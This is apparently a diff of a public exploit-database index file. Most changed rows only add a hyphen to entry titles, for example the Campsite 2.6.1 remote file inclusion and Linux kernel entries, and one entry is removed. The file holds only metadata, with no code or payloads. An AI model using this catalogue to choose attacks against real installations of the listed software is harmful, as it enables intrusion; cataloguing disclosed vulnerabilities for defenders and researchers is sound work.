g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 +29967,platforms/php/webapps/29967.txt,"Campsite 2.6.1 - Article.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 +29968,platforms/php/webapps/29968.txt,"Campsite 2.6.1 - ArticleAttachment.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 +29969,platforms/php/webapps/29969.txt,"Campsite 2.6.1 - ArticleComment.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 +29970,platforms/php/webapps/29970.txt,"Campsite 2.6.1 - ArticleData.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 +29971,platforms/php/webapps/29971.txt,"Campsite 2.6.1 - ArticleImage.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 +29972,platforms/php/webapps/29972.txt,"Campsite 2.6.1 - ArticleIndex.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 +29973,platforms/php/webapps/29973.txt,"Campsite 2.6.1 - ArticlePublish.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 +29974,platforms/php/webapps/29974.txt,"Campsite 2.6.1 - ArticleTopic.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 +29975,platforms/php/webapps/29975.txt,"Campsite 2.6.1 - ArticleType.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 +29976,platforms/php/webapps/29976.txt,"Campsite 2.6.1 - ArticleTypeField.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 +29977,platforms/php/webapps/29977.txt,"Campsite 2.6.1 - Country.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 +29978,platforms/php/webapps/29978.txt,"Campsite 2.6.1 - DatabaseObject.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 30373,platforms/windows/remote/30373.py,"Ability Mail Server 2013 (3.1.1) - Stored XSS (Web UI)",2013-12-17,"David Um",windows,remote,0 -29979,platforms/php/webapps/29979.txt,"Campsite 2.6.1 Event.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 -29980,platforms/php/webapps/29980.txt,"Campsite 2.6.1 IPAccess.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 -29981,platforms/php/webapps/29981.txt,"Campsite 2.6.1 Image.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 -29982,platforms/php/webapps/29982.txt,"Campsite 2.6.1 Issue.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 -29983,platforms/php/webapps/29983.txt,"Campsite 2.6.1 IssuePublish.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 -29984,platforms/php/webapps/29984.txt,"Campsite 2.6.1 Language.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 -29985,platforms/php/webapps/29985.txt,"Campsite 2.6.1 Log.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 -29986,platforms/php/webapps/29986.txt,"Campsite 2.6.1 LoginAttempts.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 -29987,platforms/php/webapps/29987.txt,"Campsite 2.6.1 Publication.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 -29988,platforms/php/webapps/29988.txt,"Campsite 2.6.1 Section.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 -29989,platforms/php/webapps/29989.txt,"Campsite 2.6.1 ShortURL.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 -29990,platforms/php/webapps/29990.txt,"Campsite 2.6.1 Subscription.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 -29991,platforms/php/webapps/29991.txt,"Campsite 2.6.1 SubscriptionDefaultTime.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 -29996,platforms/php/webapps/29996.txt,"Campsite 2.6.1 Topic.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 -29997,platforms/php/webapps/29997.txt,"Campsite 2.6.1 UrlType.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 -29998,platforms/php/webapps/29998.txt,"Campsite 2.6.1 User.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 -29999,platforms/php/webapps/29999.txt,"Campsite 2.6.1 UserType.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 +29979,platforms/php/webapps/29979.txt,"Campsite 2.6.1 - Event.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 +29980,platforms/php/webapps/29980.txt,"Campsite 2.6.1 - IPAccess.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 +29981,platforms/php/webapps/29981.txt,"Campsite 2.6.1 - Image.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 +29982,platforms/php/webapps/29982.txt,"Campsite 2.6.1 - Issue.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 +29983,platforms/php/webapps/29983.txt,"Campsite 2.6.1 - IssuePublish.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 +29984,platforms/php/webapps/29984.txt,"Campsite 2.6.1 - Language.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 +29985,platforms/php/webapps/29985.txt,"Campsite 2.6.1 - Log.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 +29986,platforms/php/webapps/29986.txt,"Campsite 2.6.1 - LoginAttempts.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 +29987,platforms/php/webapps/29987.txt,"Campsite 2.6.1 - Publication.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 +29988,platforms/php/webapps/29988.txt,"Campsite 2.6.1 - Section.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 +29989,platforms/php/webapps/29989.txt,"Campsite 2.6.1 - ShortURL.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 +29990,platforms/php/webapps/29990.txt,"Campsite 2.6.1 - Subscription.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 +29991,platforms/php/webapps/29991.txt,"Campsite 2.6.1 - SubscriptionDefaultTime.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 +29996,platforms/php/webapps/29996.txt,"Campsite 2.6.1 - Topic.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 +29997,platforms/php/webapps/29997.txt,"Campsite 2.6.1 - UrlType.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 +29998,platforms/php/webapps/29998.txt,"Campsite 2.6.1 - User.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 +29999,platforms/php/webapps/29999.txt,"Campsite 2.6.1 - UserType.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 30000,platforms/ios/webapps/30000.txt,"Photo Transfer Wifi 1.4.4 iOS - Multiple Web Vulnerabilities",2013-12-02,Vulnerability-Lab,ios,webapps,0 30002,platforms/php/webapps/30002.txt,"WordPress Formcraft Plugin - SQL Injection Vulnerability",2013-12-02,"Ashiyane Digital Security Team",php,webapps,0 -30003,platforms/php/webapps/30003.txt,"Campsite 2.6.1 implementation/management/configuration.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 -30004,platforms/php/webapps/30004.txt,"Campsite 2.6.1 implementation/management/db_connect.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 +30003,platforms/php/webapps/30003.txt,"Campsite 2.6.1 - implementation/management/configuration.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 +30004,platforms/php/webapps/30004.txt,"Campsite 2.6.1 - implementation/management/db_connect.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 30005,platforms/php/webapps/30005.txt,"Campsite 2.6.1 - LocalizerConfig.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 30006,platforms/php/webapps/30006.txt,"Campsite 2.6.1 - LocalizerLanguage.php g_documentRoot Parameter Remote File Inclusion",2007-05-08,anonymous,php,webapps,0 30007,platforms/windows/local/30007.txt,"Notepad++ Plugin Notepad 1.5 - Local Exploit",2013-12-03,"Junwen Sun",windows,local,0 @@ -27818,7 +27818,7 @@ id,file,description,date,author,platform,type,port 30898,platforms/linux/dos/30898.pl,"Common UNIX Printing System 1.2/1.3 SNMP 'asn1_get_string()' Remote Buffer Overflow Vulnerability",2007-11-06,wei_wang,linux,dos,0 30899,platforms/php/webapps/30899.txt,"Mambo 4.6.2 Index.PHP Multiple Cross-Site Scripting Vulnerabilities",2007-12-18,"Beenu Arora",php,webapps,0 30901,platforms/windows/remote/30901.txt,"Apache HTTP Server 2.2.6 Windows Share PHP File Extension Mapping Information Disclosure Vulnerability",2007-12-19,"Maciej Piotr Falkiewicz",windows,remote,0 -30902,platforms/linux/dos/30902.c,"Linux Kernel 2.6.22 IPv6 Hop-By-Hop Header Remote Denial of Service Vulnerability",2007-12-19,"Clemens Kurtenbach",linux,dos,0 +30902,platforms/linux/dos/30902.c,"Linux Kernel 2.6.22 - IPv6 Hop-By-Hop Header Remote Denial of Service Vulnerability",2007-12-19,"Clemens Kurtenbach",linux,dos,0 30903,platforms/multiple/dos/30903.c,"id3lib ID3 Tags Buffer Overflow Vulnerability",2007-12-19,"Luigi Auriemma",multiple,dos,0 30905,platforms/multiple/remote/30905.txt,"Adobe Flash Player 8.0.34.0/9.0.x main.swf baseurl Parameter asfunction: Protocol Handler XSS",2007-12-18,"Rich Cannings",multiple,remote,0 30906,platforms/multiple/dos/30906.c,"ProWizard 4 PC 1.62 - Multiple Remote Stack Based Buffer Overflow Vulnerabilities",2007-12-19,"Luigi Auriemma",multiple,dos,0 @@ -27931,7 +27931,7 @@ id,file,description,date,author,platform,type,port 31033,platforms/hardware/webapps/31033.py,"ASUS RT-N56U - Remote Root Shell Buffer Overflow (ROP)",2014-01-19,"Jacob Holcomb",hardware,webapps,80 31034,platforms/php/webapps/31034.txt,"MyBB <= 1.2.10 - 'moderation.php' Multiple SQL Injection Vulnerabilities",2008-01-16,waraxe,php,webapps,0 31035,platforms/php/webapps/31035.txt,"Clever Copy 3.0 - Multiple SQL Injection and Cross-Site Scripting Vulnerabilities",2008-01-17,hadihadi,php,webapps,0 -31036,platforms/windows/local/31036.txt,"CORE FORCE Firewall 0.95.167 and Registry Modules Multiple Local Kernel Buffer Overflow Vulnerabilities",2008-01-17,"Sebastian Gottschalk",windows,local,0 +31036,platforms/windows/local/31036.txt,"CORE FORCE Firewall 0.95.167 and Registry Modules - Multiple Local Kernel Buffer Overflow Vulnerabilities",2008-01-17,"Sebastian Gottschalk",windows,local,0 31037,platforms/php/webapps/31037.txt,"phpAutoVideo 2.21 sidebar.php loadpage Parameter Remote File Inclusion",2008-01-18,"H-T Team",php,webapps,0 31038,platforms/php/webapps/31038.txt,"phpAutoVideo 2.21 index.php cat Parameter XSS",2008-01-18,"H-T Team",php,webapps,0 31039,platforms/windows/remote/31039.txt,"BitDefender Products Update Server HTTP Daemon Directory Traversal Vulnerability",2008-01-19,"Oliver Karow",windows,remote,0 @@ -29240,7 +29240,7 @@ id,file,description,date,author,platform,type,port 32448,platforms/java/webapps/32448.txt,"Celoxis Multiple Cross-Site Scripting Vulnerabilities",2008-10-01,teuquooch1seero,java,webapps,0 32449,platforms/php/webapps/32449.txt,"H-Sphere WebShell 4.3.10 - 'actions.php' Multiple Cross-Site Scripting Vulnerabilities",2008-10-01,C1c4Tr1Z,php,webapps,0 32450,platforms/php/webapps/32450.txt,"WikyBlog 1.7.1 - Multiple Cross-Site Scripting Vulnerabilities",2008-10-01,"Omer Singer",php,webapps,0 -32451,platforms/linux/dos/32451.txt,"Fedora 8/9 Linux Kernel 'utrace_control' NULL Pointer Dereference Denial of Service Vulnerability",2008-10-02,"Michael Simms",linux,dos,0 +32451,platforms/linux/dos/32451.txt,"Fedora 8/9 Linux Kernel - 'utrace_control' NULL Pointer Dereference Denial of Service Vulnerability",2008-10-02,"Michael Simms",linux,dos,0 32452,platforms/linux/dos/32452.txt,"Adobe Flash Player 9/10 - SWF Version Null Pointer Dereference Denial of Service Vulnerability",2008-10-02,"Matthew Dempsky",linux,dos,0 32453,platforms/php/webapps/32453.txt,"Dreamcost HostAdmin 3.1 - 'index.php' Cross-Site Scripting Vulnerability",2008-10-02,Am!r,php,webapps,0 32454,platforms/unix/dos/32454.xml,"libxml2 - Denial of Service Vulnerability",2008-10-02,"Christian Weiske",unix,dos,0 @@ -30141,7 +30141,7 @@ id,file,description,date,author,platform,type,port 33395,platforms/linux/local/33395.txt,"Linux Kernel 2.6.x - Ext4 - 'move extents' ioctl Local Privilege Escalation Vulnerability",2009-11-09,"Akira Fujita",linux,local,0 33396,platforms/php/webapps/33396.txt,"Zeeways ZeeJobsite 'basic_search_result.php' Cross-Site Scripting Vulnerability",2009-12-10,bi0,php,webapps,0 33397,platforms/linux/dos/33397.txt,"MySQL <= 6.0.9 SELECT Statement WHERE Clause Sub-query DoS",2009-11-23,"Shane Bester",linux,dos,0 -33398,platforms/linux/dos/33398.txt,"MySQL <= 6.0.9 GeomFromWKB() Function First Argument Geometry Value Handling DoS",2009-11-23,"Shane Bester",linux,dos,0 +33398,platforms/linux/dos/33398.txt,"MySQL <= 6.0.9 - GeomFromWKB() Function First Argument Geometry Value Handling DoS",2009-11-23,"Shane Bester",linux,dos,0 33399,platforms/multiple/remote/33399.txt,"Oracle E-Business Suite 11i Multiple Remote Vulnerabilities",2009-12-14,Hacktics,multiple,remote,0 33400,platforms/php/webapps/33400.txt,"Ez Cart 'sid' Parameter Cross-Site Scripting Vulnerability",2009-12-14,anti-gov,php,webapps,0 33435,platforms/php/webapps/33435.txt,"ClarkConnect Linux 5.0 - 'proxy.php' Cross-Site Scripting Vulnerability",2009-12-22,"Edgard Chammas",php,webapps,0 @@ -31707,7 +31707,7 @@ id,file,description,date,author,platform,type,port 35179,platforms/windows/dos/35179.py,"i.Mage 1.11 - Local Crash PoC",2014-11-06,metacom,windows,dos,0 35180,platforms/bsd/remote/35180.rb,"Citrix NetScaler SOAP Handler - Remote Code Execution",2014-11-06,metasploit,bsd,remote,0 35181,platforms/jsp/webapps/35181.txt,"Symantec Endpoint Protection 12.1.4023.4080 - Multiple Vulnerabilities",2014-11-06,"SEC Consult",jsp,webapps,0 -35182,platforms/windows/dos/35182.txt,"VMware Workstations 10.0.0.40273 vmx86.sys Arbitrary Kernel Read",2014-11-06,KoreLogic,windows,dos,0 +35182,platforms/windows/dos/35182.txt,"VMware Workstations 10.0.0.40273 - vmx86.sys Arbitrary Kernel Read",2014-11-06,KoreLogic,windows,dos,0 35183,platforms/php/remote/35183.rb,"X7 Chat 2.0.5 lib/message.php preg_replace() PHP Code Execution",2014-11-06,metasploit,php,remote,80 35184,platforms/hardware/remote/35184.py,"Belkin n750 jump login Parameter Buffer Overflow",2014-11-06,"Marco Vaz",hardware,remote,8080 35185,platforms/php/webapps/35185.txt,"WonderCMS 0.3.3 - 'editText.php' Cross-Site Scripting Vulnerability",2011-01-04,"High-Tech Bridge SA",php,webapps,0 @@ -32730,7 +32730,7 @@ id,file,description,date,author,platform,type,port 36291,platforms/windows/remote/36291.txt,"XAMPP 1.7.7 'PHP_SELF' Variable Multiple Cross Site Scripting Vulnerabilities",2011-11-07,"Gjoko Krstic",windows,remote,0 36292,platforms/java/webapps/36292.txt,"Oracle NoSQL 11g 1.1.100 R2 - 'log' Parameter Directory Traversal Vulnerability",2011-11-07,Buherátor,java,webapps,0 36293,platforms/php/webapps/36293.txt,"Centreon 2.3.1 'command_name' Parameter Remote Command Execution Vulnerability",2011-11-04,"Christophe de la Fuente",php,webapps,0 -36294,platforms/linux/local/36294.c,"Linux Kernel <= 3.0.4 '/proc/interrupts' Password Length Local Information Disclosure Weakness",2011-11-07,"Vasiliy Kulikov",linux,local,0 +36294,platforms/linux/local/36294.c,"Linux Kernel <= 3.0.4 - '/proc/interrupts' Password Length Local Information Disclosure Weakness",2011-11-07,"Vasiliy Kulikov",linux,local,0 36295,platforms/php/webapps/36295.txt,"PBCS Technology 'articlenav.php' SQL Injection Vulnerability",2011-11-08,Kalashinkov3,php,webapps,0 36296,platforms/bsd/local/36296.pl,"OpenPAM - 'pam_start()' Local Privilege Escalation Vulnerability",2011-11-09,IKCE,bsd,local,0 36297,platforms/php/webapps/36297.txt,"AShop Open-Redirection and Cross Site Scripting Vulnerabilities",2011-11-09,"Infoserve Security Team",php,webapps,0 @@ -32859,7 +32859,7 @@ id,file,description,date,author,platform,type,port 36422,platforms/windows/dos/36422.txt,"Fortinet Single Sign On - Stack Overflow",2015-03-18,"Core Security",windows,dos,8000 36423,platforms/java/webapps/36423.txt,"Websense Appliance Manager Command Injection Vulnerability",2015-03-18,"Han Sahin",java,webapps,9447 36424,platforms/windows/local/36424.txt,"Windows 8.1 - Local WebDAV NTLM Reflection Elevation of Privilege",2015-03-19,"Google Security Research",windows,local,0 -36425,platforms/linux/dos/36425.txt,"Linux Kernel Network Namespace Remote Denial of Service Vulnerability",2011-12-06,"Serge Hallyn",linux,dos,0 +36425,platforms/linux/dos/36425.txt,"Linux Kernel - Network Namespace Remote Denial of Service Vulnerability",2011-12-06,"Serge Hallyn",linux,dos,0 36426,platforms/multiple/remote/36426.txt,"Apache Struts 2.0.9/2.1.8 Session Tampering Security Bypass Vulnerability",2011-12-07,"Hisato Killing",multiple,remote,0 36427,platforms/windows/dos/36427.txt,"PowerDVD 11.0.0.2114 Remote Denial of Service Vulnerability",2011-12-07,"Luigi Auriemma",windows,dos,0 36428,platforms/hardware/remote/36428.txt,"Axis M10 Series Network Cameras Cross Site Scripting Vulnerability",2011-12-07,"Matt Metzger",hardware,remote,0 @@ -32970,7 +32970,7 @@ id,file,description,date,author,platform,type,port 36542,platforms/windows/remote/36542.txt,"ExpressView Browser Plugin 6.5.0.3330 - Multiple Integer Overflow and Remote Code Execution Vulnerabilities",2012-01-11,"Luigi Auriemma",windows,remote,0 36543,platforms/php/webapps/36543.txt,"KnowledgeTree 3.x Multiple Cross Site Scripting Vulnerabilities",2012-01-11,"High-Tech Bridge SA",php,webapps,0 36544,platforms/php/webapps/36544.txt,"Kayako SupportSuite 3.x Multiple Vulnerabilities",2012-01-11,"Yuri Goltsev",php,webapps,0 -36545,platforms/linux/dos/36545.txt,"Linux Kernel <= 3.1.8 KVM Local Denial of Service Vulnerability",2011-12-29,"Stephan Sattler",linux,dos,0 +36545,platforms/linux/dos/36545.txt,"Linux Kernel <= 3.1.8 - KVM Local Denial of Service Vulnerability",2011-12-29,"Stephan Sattler",linux,dos,0 36546,platforms/windows/remote/36546.txt,"GreenBrowser 6.0.1002 - Search Bar Short Cut Button Double Free Remote Memory Corruption Vulnerability",2012-01-12,NCNIPC,windows,remote,0 36547,platforms/asp/webapps/36547.txt,"MailEnable <= 6.02 'ForgottonPassword.aspx' Cross Site Scripting Vulnerability",2012-01-12,"Sajjad Pourali",asp,webapps,0 36548,platforms/java/webapps/36548.txt,"Contus Job Portal 'Category' Parameter SQL Injection Vulnerability",2012-01-13,Lazmania61,java,webapps,0 @@ -33898,7 +33898,7 @@ id,file,description,date,author,platform,type,port 37540,platforms/php/webapps/37540.txt,"Joomla Odudeprofile component 'profession' Parameter SQL Injection Vulnerability",2012-07-25,"Daniel Barragan",php,webapps,0 37541,platforms/php/webapps/37541.txt,"tekno.Portal 0.1b 'anket.php' SQL Injection Vulnerability",2012-07-25,Socket_0x03,php,webapps,0 37542,platforms/windows/remote/37542.html,"BarCodeWiz 'BarcodeWiz.dll' ActiveX Control 'Barcode' Method Remote Buffer Overflow Vulnerability",2012-07-25,coolkaveh,windows,remote,0 -37543,platforms/linux/local/37543.c,"Linux Kernel 2.6.x 'rds_recvmsg()' Function Local Information Disclosure Vulnerability",2012-07-26,"Jay Fenlason",linux,local,0 +37543,platforms/linux/local/37543.c,"Linux Kernel 2.6.x - 'rds_recvmsg()' Function Local Information Disclosure Vulnerability",2012-07-26,"Jay Fenlason",linux,local,0 37544,platforms/php/webapps/37544.txt,"ocPortal 7.1.5 'redirect' Parameter URI Redirection Vulnerability",2012-07-29,"Aung Khant",php,webapps,0 37547,platforms/php/webapps/37547.txt,"Scrutinizer 9.0.1.19899 Multiple Cross Site Scripting Vulnerabilities",2012-07-30,"Mario Ceballos",php,webapps,0 37548,platforms/php/webapps/37548.txt,"Scrutinizer 9.0.1.19899 Arbitrary File Upload Vulnerability",2012-07-30,"Mario Ceballos",php,webapps,0 @@ -34168,7 +34168,7 @@ id,file,description,date,author,platform,type,port 37828,platforms/php/webapps/37828.txt,"Poweradmin 'index.php' Cross Site Scripting Vulnerability",2012-09-20,Siavash,php,webapps,0 37829,platforms/php/webapps/37829.txt,"WordPress MF Gig Calendar Plugin Cross Site Scripting Vulnerability",2012-09-20,"Chris Cooper",php,webapps,0 37830,platforms/cgi/webapps/37830.txt,"ZEN Load Balancer Multiple Security Vulnerabilities",2012-09-24,"Brendan Coles",cgi,webapps,0 -37937,platforms/linux/local/37937.c,"Linux Kernel 3.2.x 'uname()' System Call Local Information Disclosure Vulnerability",2012-10-09,"Brad Spengler",linux,local,0 +37937,platforms/linux/local/37937.c,"Linux Kernel 3.2.x - 'uname()' System Call Local Information Disclosure Vulnerability",2012-10-09,"Brad Spengler",linux,local,0 37938,platforms/php/webapps/37938.txt,"OpenX /www/admin/plugin-index.php parent Parameter XSS",2012-10-10,"High-Tech Bridge",php,webapps,0 37939,platforms/php/webapps/37939.txt,"FileContral Local File Include and Local File Disclosure Vulnerabilities",2012-08-11,"Ashiyane Digital Security Team",php,webapps,0 38066,platforms/php/webapps/38066.txt,"WordPress Video Lead Form Plugin 'errMsg' Parameter Cross Site Scripting Vulnerability",2012-11-29,"Aditya Balapure",php,webapps,0 @@ -34441,7 +34441,7 @@ id,file,description,date,author,platform,type,port 38129,platforms/php/webapps/38129.txt,"Octogate UTM 3.0.12 - Admin Interface Directory Traversal",2015-09-10,"Oliver Karow",php,webapps,0 38130,platforms/java/webapps/38130.txt,"N-able N-central Cross-Site Request Forgery Vulnerability",2012-12-13,"Cartel Informatique Security Research Labs",java,webapps,0 38131,platforms/php/webapps/38131.txt,"PHP Address Book 'group' Parameter Cross Site Scripting Vulnerability",2012-12-13,"Kenneth F. Belva",php,webapps,0 -38132,platforms/linux/dos/38132.py,"Linux Kernel <= 3.3.5 Btrfs CRC32C feature Infinite Loop Local Denial of Service Vulnerability",2012-12-13,"Pascal Junod",linux,dos,0 +38132,platforms/linux/dos/38132.py,"Linux Kernel <= 3.3.5 - Btrfs CRC32C feature Infinite Loop Local Denial of Service Vulnerability",2012-12-13,"Pascal Junod",linux,dos,0 38133,platforms/php/webapps/38133.txt,"RokBox Plugin for WordPress /wp-content/plugins/wp_rokbox/jwplayer/jwplayer.swf abouttext Parameter XSS",2012-12-17,MustLive,php,webapps,0 38134,platforms/php/webapps/38134.txt,"Joomla! ZT Autolinks Component 'controller' Parameter Local File Include Vulnerability",2012-12-19,Xr0b0t,php,webapps,0 38135,platforms/php/webapps/38135.txt,"Joomla! Bit Component 'controller' Parameter Local File Include Vulnerability",2012-12-19,Xr0b0t,php,webapps,0 @@ -34686,7 +34686,7 @@ id,file,description,date,author,platform,type,port 38387,platforms/multiple/remote/38387.txt,"RubyGems fastreader 'entry_controller.rb' Remote Command Execution Vulnerability",2013-03-12,"Larry W. Cashdollar",multiple,remote,0 38388,platforms/windows/remote/38388.txt,"QlikView '.qvw' File Remote Integer Overflow Vulnerability",2013-03-13,"A. Antukh",windows,remote,0 38389,platforms/hardware/remote/38389.txt,"Cisco Video Surveillance Operations Manager Multiple Security Vulnerabilities",2013-03-13,b.saleh,hardware,remote,0 -38390,platforms/linux/local/38390.c,"Linux Kernel 3.3.5 'CLONE_NEWUSER|CLONE_FS' Local Privilege Escalation Vulnerability",2013-03-13,"Sebastian Krahmer",linux,local,0 +38390,platforms/linux/local/38390.c,"Linux Kernel 3.3.5 - 'CLONE_NEWUSER|CLONE_FS' Local Privilege Escalation Vulnerability",2013-03-13,"Sebastian Krahmer",linux,local,0 38391,platforms/php/webapps/38391.txt,"Petite Annonce Cross Site Scripting Vulnerability",2013-03-14,Metropolis,php,webapps,0 38392,platforms/linux/dos/38392.txt,"MySQL and MariaDB Geometry Query Denial Of Service Vulnerability",2013-03-07,"Alyssa Milburn",linux,dos,0 38393,platforms/php/webapps/38393.html,"WordPress Occasions Plugin Cross Site Request Forgery Vulnerability",2013-03-19,m3tamantra,php,webapps,0 @@ -34758,7 +34758,7 @@ id,file,description,date,author,platform,type,port 38462,platforms/java/webapps/38462.txt,"Hero Framework /users/forgot_password error Parameter XSS",2013-04-10,"High-Tech Bridge",java,webapps,0 38463,platforms/multiple/webapps/38463.txt,"Aibolit Information Disclosure Vulnerability",2013-04-13,MustLive,multiple,webapps,0 38464,platforms/hardware/remote/38464.txt,"Cisco Linksys EA2700 Router Multiple Security Vulnerabilities",2013-04-15,"Phil Purviance",hardware,remote,0 -38465,platforms/linux/local/38465.txt,"Linux Kernel <= 3.2.1 Tracing Mutiple Local Denial of Service Vulnerabilities",2013-04-15,anonymous,linux,local,0 +38465,platforms/linux/local/38465.txt,"Linux Kernel <= 3.2.1 - Tracing Mutiple Local Denial of Service Vulnerabilities",2013-04-15,anonymous,linux,local,0 38467,platforms/windows/local/38467.py,"AdobeWorkgroupHelper 2.8.3.3 - Stack Based Buffer Overflow",2015-10-15,hyp3rlinx,windows,local,0 38469,platforms/lin_x86-64/shellcode/38469.c,"Linux x86_64 Bindshell with Password (92 bytes)",2015-10-15,d4sh&r,lin_x86-64,shellcode,0 38470,platforms/hardware/webapps/38470.txt,"netis RealTek Wireless Router / ADSL Modem - Multiple Vulnerabilities",2015-10-15,"Karn Ganeshen",hardware,webapps,0 @@ -34827,7 +34827,6 @@ id,file,description,date,author,platform,type,port 38645,platforms/jsp/webapps/38645.txt,"NXFilter 3.0.3 - CSRF Vulnerabilities",2015-11-06,hyp3rlinx,jsp,webapps,0 38540,platforms/osx/local/38540.rb,"Mac OS X 10.9.5 / 10.10.5 - rsh/libmalloc Privilege Escalation",2015-10-27,metasploit,osx,local,0 38541,platforms/php/remote/38541.rb,"Th3 MMA mma.php Backdoor Arbitrary File Upload",2015-10-27,metasploit,php,remote,80 -38542,platforms/windows/local/38542.cpp,"Win10Pcap - Local Privilege Escalation Vulnerability",2015-10-27,R00tkitSMM,windows,local,0 38543,platforms/php/webapps/38543.txt,"php4dvd 'config.php' PHP Code Injection Vulnerability",2012-05-31,"CWH Underground",php,webapps,0 38544,platforms/php/webapps/38544.txt,"Elastix Multiple Cross Site Scripting Vulnerabilities",2013-05-28,cheki,php,webapps,0 38545,platforms/php/webapps/38545.txt,"Telaen 2.7.x Cross Site Scripting Vulnerability",2013-06-04,"Manuel García Cárdenas",php,webapps,0 @@ -34839,18 +34838,18 @@ id,file,description,date,author,platform,type,port 38551,platforms/java/webapps/38551.py,"JIRA and HipChat for JIRA Plugin Velocity Template Injection Vulnerability",2015-10-28,"Chris Wood",java,webapps,0 38553,platforms/hardware/webapps/38553.txt,"Sagem FAST3304-V2 - Authentication Bypass",2015-10-28,"Soufiane Alami Hassani",hardware,webapps,0 38554,platforms/android/remote/38554.py,"Samsung SecEmailUI Script Injection",2015-10-28,"Google Security Research",android,remote,0 -38555,platforms/android/dos/38555.txt,"Samsung m2m1shot Kernel Driver Buffer Overflow",2015-10-28,"Google Security Research",android,dos,0 -38556,platforms/android/dos/38556.txt,"Samsung seiren Kernel Driver Buffer Overflow",2015-10-28,"Google Security Research",android,dos,0 +38555,platforms/android/dos/38555.txt,"Samsung - m2m1shot Kernel Driver Buffer Overflow",2015-10-28,"Google Security Research",android,dos,0 +38556,platforms/android/dos/38556.txt,"Samsung - seiren Kernel Driver Buffer Overflow",2015-10-28,"Google Security Research",android,dos,0 38557,platforms/android/dos/38557.txt,"Samsung fimg2d FIMG2D_BITBLT_BLIT ioctl Concurrency Flaw",2015-10-28,"Google Security Research",android,dos,0 38558,platforms/android/dos/38558.txt,"Samsung SecEmailComposer QUICK_REPLY_BACKGROUND Permissions Weakness",2015-10-28,"Google Security Research",android,dos,0 -38559,platforms/linux/local/38559.txt,"Linux Kernel <= 3.3.5 'b43' Wireless Driver Local Privilege Escalation Vulnerability",2013-06-07,"Kees Cook",linux,local,0 +38559,platforms/linux/local/38559.txt,"Linux Kernel <= 3.3.5 - 'b43' Wireless Driver Local Privilege Escalation Vulnerability",2013-06-07,"Kees Cook",linux,local,0 38560,platforms/php/webapps/38560.txt,"Caucho Resin /resin-admin/ URI XSS",2013-06-07,"Gjoko Krstic",php,webapps,0 38561,platforms/php/webapps/38561.txt,"Caucho Resin index.php logout Parameter XSS",2013-06-07,"Gjoko Krstic",php,webapps,0 38562,platforms/php/webapps/38562.txt,"HP Insight Diagnostics Remote Code Injection Vulnerability",2013-06-10,"Markus Wulftange",php,webapps,0 